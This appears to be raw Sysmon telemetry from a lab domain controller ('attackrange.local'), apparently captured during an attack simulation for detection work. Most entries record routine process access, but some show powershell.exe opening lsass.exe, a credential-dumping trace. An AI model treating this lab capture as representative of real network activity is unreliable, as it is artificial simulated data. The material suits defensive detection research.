10:39:18.093{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.093{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 13241300x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:39:17.999{733EE690-3DD5-5F80-0303-000000007E01}2428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 10341000x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:19.062{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:19.062{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:19.062{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.875{733EE690-3D6B-5F80-5800-000000007E01}12363436C:\Windows\servicing\TrustedInstaller.exe{733EE690-3D6B-5F80-5900-000000007E01}2340C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eba8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.828{733EE690-3C69-5F80-0E00-000000007E01}10882104C:\Windows\system32\LogonUI.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.828{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.828{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.828{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.828{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3C69-5F80-0E00-000000007E01}1088C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.828{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.828{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0900-000000007E01}804C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+599c8|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.828{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0900-000000007E01}804C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.734{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD8-5F80-1603-000000007E01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.734{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD8-5F80-1603-000000007E01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 